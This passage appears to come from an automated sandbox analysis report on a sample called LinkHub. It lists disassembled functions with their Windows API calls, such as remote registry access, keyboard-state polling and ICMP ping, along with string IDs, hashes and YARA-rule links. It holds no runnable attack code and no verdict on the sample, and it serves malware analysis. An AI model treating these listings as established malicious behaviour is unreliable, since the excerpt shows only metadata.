                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleLoadModuleString$Message_wcslen
                                                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                        • API String ID: 747408836-2268648507
                                                                                        • Opcode ID: 6a87180adc42df47d6312c66a1676ddcc4b01b459c228521de29a48ae484f9c6
                                                                                        • Instruction ID: 789c695b5b94fc1d3b88032d6a2607998f680198d6c4ba132260f321cfe963ab
                                                                                        • Opcode Fuzzy Hash: 6a87180adc42df47d6312c66a1676ddcc4b01b459c228521de29a48ae484f9c6
                                                                                        • Instruction Fuzzy Hash: 2D413E72810209AACB15EBE0DD46EEEB778AF19304F5000A5B505B20D3EB756F69DFA1
                                                                                        Function 00260FCF Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00208577: _wcslen.LIBCMT ref: 0020858A
                                                                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00261093
                                                                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 002610AF
                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 002610CB
                                                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 002610F5
                                                                                        • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0026111D
                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00261128
                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0026112D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                        • API String ID: 323675364-22481851
                                                                                        • Opcode ID: 5fce0e9c38b7a1f15cae511f8198f7f30f503ebf08bdb50d321983d11b9ac347
                                                                                        • Instruction ID: cde3b8a2006e448974460f047649d640e06bd2d308bb40e192cc0a7d41547089
                                                                                        • Opcode Fuzzy Hash: 5fce0e9c38b7a1f15cae511f8198f7f30f503ebf08bdb50d321983d11b9ac347
                                                                                        • Instruction Fuzzy Hash: DF410C72C20229ABCF21EFA4DC85DEEB778BF08740F444169E905A31A1EB315D64DF50
                                                                                        Function 00294A34 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00294AD9
                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00294AE0
                                                                                        • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00294AF3
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00294AFB
                                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 00294B06
                                                                                        • DeleteDC.GDI32(00000000), ref: 00294B10
                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00294B1A
                                                                                        • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00294B30
                                                                                        • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00294B3C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                        • String ID: static
                                                                                        • API String ID: 2559357485-2160076837
                                                                                        • Opcode ID: f0c9f5c183a46ff03f03456eaa823326827cf863f07b9f646836a8a0502c9ef6
                                                                                        • Instruction ID: 64c749bf0a5cd4cccee1fe51fa77f722c84b4121a00afe7962aba6094eea8e6d
                                                                                        • Opcode Fuzzy Hash: f0c9f5c183a46ff03f03456eaa823326827cf863f07b9f646836a8a0502c9ef6
                                                                                        • Instruction Fuzzy Hash: 5E317032511215BBDF11AFA4EC08FDA3BA9FF0D364F110212FA19E61A0C775D861EB94
                                                                                        Function 0028468D Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • VariantInit.OLEAUT32(?), ref: 002846B9
                                                                                        • CoInitialize.OLE32(00000000), ref: 002846E7
                                                                                        • CoUninitialize.OLE32 ref: 002846F1
                                                                                        • _wcslen.LIBCMT ref: 0028478A
                                                                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 0028480E
                                                                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 00284932
                                                                                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 0028496B
                                                                                        • CoGetObject.OLE32(?,00000000,002A0B64,?), ref: 0028498A
                                                                                        • SetErrorMode.KERNEL32(00000000), ref: 0028499D
                                                                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00284A21
                                                                                        • VariantClear.OLEAUT32(?), ref: 00284A35
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                        • String ID:
                                                                                        • API String ID: 429561992-0
                                                                                        • Opcode ID: 9da3f2d612dd6d5bbe636ecf255f4bed6d63e2890601e948c53b22020488e85c
                                                                                        • Instruction ID: d4e1f98569323f9338f04cd5759a30cc7ffa40f5790c3119583c88752709d907
                                                                                        • Opcode Fuzzy Hash: 9da3f2d612dd6d5bbe636ecf255f4bed6d63e2890601e948c53b22020488e85c
                                                                                        • Instruction Fuzzy Hash: D9C17775628302AFD700EF68C88492BB7E9FF89748F04491DF9899B291DB70ED15CB52
                                                                                        Function 002784DB Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CoInitialize.OLE32(00000000), ref: 00278538
                                                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 002785D4
                                                                                        • SHGetDesktopFolder.SHELL32(?), ref: 002785E8
                                                                                        • CoCreateInstance.OLE32(002A0CD4,00000000,00000001,002C7E8C,?), ref: 00278634
                                                                                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 002786B9
                                                                                        • CoTaskMemFree.OLE32(?,?), ref: 00278711
                                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 0027879C
                                                                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 002787BF
                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 002787C6
                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 0027881B
                                                                                        • CoUninitialize.OLE32 ref: 00278821
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                        • String ID:
                                                                                        • API String ID: 2762341140-0
                                                                                        • Opcode ID: bea66717b870d3d2165a1c0b0888e1df0faecd98f9b1a330b22d19d7415e7d05
                                                                                        • Instruction ID: bbab75734971f1d6c6e9de2df226e4d60aa871aa32e5ed95a918982214f06047
                                                                                        • Opcode Fuzzy Hash: bea66717b870d3d2165a1c0b0888e1df0faecd98f9b1a330b22d19d7415e7d05
                                                                                        • Instruction Fuzzy Hash: 7FC12D75A10209AFDB14DFA4C888DAEBBF9FF48304B148199E41ADB262DB30ED55CF50
                                                                                        Function 00260378 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0026039F
                                                                                        • SafeArrayAllocData.OLEAUT32(?), ref: 002603F8
                                                                                        • VariantInit.OLEAUT32(?), ref: 0026040A
                                                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 0026042A
                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 0026047D
                                                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 00260491
                                                                                        • VariantClear.OLEAUT32(?), ref: 002604A6
                                                                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 002604B3
                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 002604BC
                                                                                        • VariantClear.OLEAUT32(?), ref: 002604CE
                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 002604D9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                        • String ID:
                                                                                        • API String ID: 2706829360-0
                                                                                        • Opcode ID: 8abbb4a0e4d7f0c99812a74b8e05ccb62803b2c307c6dcf28ddd2cafbcba5b12
                                                                                        • Instruction ID: e6fd4aa14aabec7c4fb856b8c104393a0e1fa43843a42ee0e5a59e557ecb6cb6
                                                                                        • Opcode Fuzzy Hash: 8abbb4a0e4d7f0c99812a74b8e05ccb62803b2c307c6dcf28ddd2cafbcba5b12
                                                                                        • Instruction Fuzzy Hash: 8F417235A10219DFCF10DFA4D8889EE7BB9FF48344F008469E915A7261CB70E995DFA0
                                                                                        Function 0026A635 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetKeyboardState.USER32(?), ref: 0026A65D
                                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 0026A6DE
                                                                                        • GetKeyState.USER32(000000A0), ref: 0026A6F9
                                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 0026A713
                                                                                        • GetKeyState.USER32(000000A1), ref: 0026A728
                                                                                        • GetAsyncKeyState.USER32(00000011), ref: 0026A740
                                                                                        • GetKeyState.USER32(00000011), ref: 0026A752
                                                                                        • GetAsyncKeyState.USER32(00000012), ref: 0026A76A
                                                                                        • GetKeyState.USER32(00000012), ref: 0026A77C
                                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 0026A794
                                                                                        • GetKeyState.USER32(0000005B), ref: 0026A7A6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: State$Async$Keyboard
                                                                                        • String ID:
                                                                                        • API String ID: 541375521-0
                                                                                        • Opcode ID: 60988dea26f9f6a92d6eac9e1c7326146147bac60c839677d55c0fdc1dd54bd6
                                                                                        • Instruction ID: de1598eea469f380317673385f6424322b468d16960eec1d7798c33a0384a435
                                                                                        • Opcode Fuzzy Hash: 60988dea26f9f6a92d6eac9e1c7326146147bac60c839677d55c0fdc1dd54bd6
                                                                                        • Instruction Fuzzy Hash: 7F41F8645247CB6DFF325E64C5043A9FEF4AB11304F08805AD5C66A1C2EB949DE4CF63
                                                                                        Function 00280FB8 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • WSAStartup.WSOCK32(00000101,?), ref: 00281019
                                                                                        • inet_addr.WSOCK32(?), ref: 00281079
                                                                                        • gethostbyname.WSOCK32(?), ref: 00281085
                                                                                        • IcmpCreateFile.IPHLPAPI ref: 00281093
                                                                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00281123
                                                                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00281142
                                                                                        • IcmpCloseHandle.IPHLPAPI(?), ref: 00281216
                                                                                        • WSACleanup.WSOCK32 ref: 0028121C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                        • String ID: Ping
                                                                                        • API String ID: 1028309954-2246546115
                                                                                        • Opcode ID: 4e42e0db2a1a35d3f217baea65b310bfc20bdc81dc1f7759176f645177c3028b
                                                                                        • Instruction ID: 3549fb4440a7ba4fe6ff17e762380d68660728e0018c8654e397671f404d937e
                                                                                        • Opcode Fuzzy Hash: 4e42e0db2a1a35d3f217baea65b310bfc20bdc81dc1f7759176f645177c3028b
                                                                                        • Instruction Fuzzy Hash: BD91D2356152029FD720EF15D888F16BBE4BF44318F1485A9F5698B6E2C731ECA6CF81
                                                                                        Function 00289730 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcslen$BuffCharLower
                                                                                        • String ID: cdecl$none$stdcall$winapi
                                                                                        • API String ID: 707087890-567219261
                                                                                        • Opcode ID: 489e6e29b8ccb73818ee8784aaa54409c30c67c9c71646b0be14d96069adfb5f
                                                                                        • Instruction ID: 23cfbc2d74325e7bc3e003f5e427fc9fa8a278575df6f622a5edcc5ad37dd5b3
                                                                                        • Opcode Fuzzy Hash: 489e6e29b8ccb73818ee8784aaa54409c30c67c9c71646b0be14d96069adfb5f
                                                                                        • Instruction Fuzzy Hash: 9851F735A21117ABCB14EFACC9409BEB3A5BF55310B644229F826E76C4DB31DDA0CB90
                                                                                        Function 00284189 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CoInitialize.OLE32 ref: 002841D1
                                                                                        • CoUninitialize.OLE32 ref: 002841DC
                                                                                        • CoCreateInstance.OLE32(?,00000000,00000017,002A0B44,?), ref: 00284236
                                                                                        • IIDFromString.OLE32(?,?), ref: 002842A9
                                                                                        • VariantInit.OLEAUT32(?), ref: 00284341
                                                                                        • VariantClear.OLEAUT32(?), ref: 00284393
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                        • API String ID: 636576611-1287834457
                                                                                        • Opcode ID: 9b1fb85ff077c47894922f108d36d36037edc751dbce6092f06a5bb7831dba43
                                                                                        • Instruction ID: 56abc8a1e8c2d0076ed853d57835389e42d30d2eaa2b8a38ed5e25f0ef674c26
                                                                                        • Opcode Fuzzy Hash: 9b1fb85ff077c47894922f108d36d36037edc751dbce6092f06a5bb7831dba43
                                                                                        • Instruction Fuzzy Hash: E261D074629302EFD310FF64D888F5ABBE4AF49714F10494AF98597291CB70ED64CB92
                                                                                        Function 00278BDA Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetLocalTime.KERNEL32(?), ref: 00278C9C
                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00278CAC
                                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00278CB8
                                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00278D55
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00278D69
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00278D9B
                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00278DD1
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00278DDA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentDirectoryTime$File$Local$System
                                                                                        • String ID: *.*
                                                                                        • API String ID: 1464919966-438819550
                                                                                        • Opcode ID: 8945a52f4b6a581565087abf58a1451652c6a6fb61f0d2e704105a4196cd7211
                                                                                        • Instruction ID: 5150855239df854d6581a5ba2eb8d00a7efc0e8489f211a6b81d99d4a150bf66
                                                                                        • Opcode Fuzzy Hash: 8945a52f4b6a581565087abf58a1451652c6a6fb61f0d2e704105a4196cd7211
                                                                                        • Instruction Fuzzy Hash: D0617C725243059FCB10EF60D84899EB3E8FF89310F04891EF99987291DB31E955CF92
                                                                                        Function 002946E2 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateMenu.USER32 ref: 00294715
                                                                                        • SetMenu.USER32(?,00000000), ref: 00294724
                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002947AC
                                                                                        • IsMenu.USER32(?), ref: 002947C0
                                                                                        • CreatePopupMenu.USER32 ref: 002947CA
                                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 002947F7
                                                                                        • DrawMenuBar.USER32 ref: 002947FF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                        • String ID: 0$F
                                                                                        • API String ID: 161812096-3044882817
                                                                                        • Opcode ID: bde5629a1423136b0e26179a4bf7c98c14766ebaa9a644a82cf7f6276361f954
                                                                                        • Instruction ID: ea14149f08bf8261676ffeeccdde031e36b3d8907220dc8d743a3c12322de55b
                                                                                        • Opcode Fuzzy Hash: bde5629a1423136b0e26179a4bf7c98c14766ebaa9a644a82cf7f6276361f954
                                                                                        • Instruction Fuzzy Hash: 7B418875A1120AEFDF14DFA4E888EEABBB5FF09314F144129EA0597350C770A925CB50
                                                                                        Function 0026282C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0020B329: _wcslen.LIBCMT ref: 0020B333
                                                                                          • Part of subcall function 002645FD: GetClassNameW.USER32(?,?,000000FF), ref: 00264620
                                                                                        • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 002628B1
                                                                                        • GetDlgCtrlID.USER32 ref: 002628BC
                                                                                        • GetParent.USER32 ref: 002628D8
                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 002628DB
                                                                                        • GetDlgCtrlID.USER32(?), ref: 002628E4
                                                                                        • GetParent.USER32(?), ref: 002628F8
                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 002628FB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 711023334-1403004172
                                                                                        • Opcode ID: 6f73b6f678453c2177090ba053ac5aa09481194cdec74f73c71efd6d2ef6b1b9
                                                                                        • Instruction ID: 9a47584900d9803b40aa895af4eab27bb12d591f3dbab9e7e5d6671ba28be4d8
                                                                                        • Opcode Fuzzy Hash: 6f73b6f678453c2177090ba053ac5aa09481194cdec74f73c71efd6d2ef6b1b9
                                                                                        • Instruction Fuzzy Hash: 0821C274D10218BBCF11AFA0DC89EEEBBB8EF0A350F10015AB951A72D1DB755868DF60
                                                                                        Function 0026290D Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 77windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0020B329: _wcslen.LIBCMT ref: 0020B333
                                                                                          • Part of subcall function 002645FD: GetClassNameW.USER32(?,?,000000FF), ref: 00264620
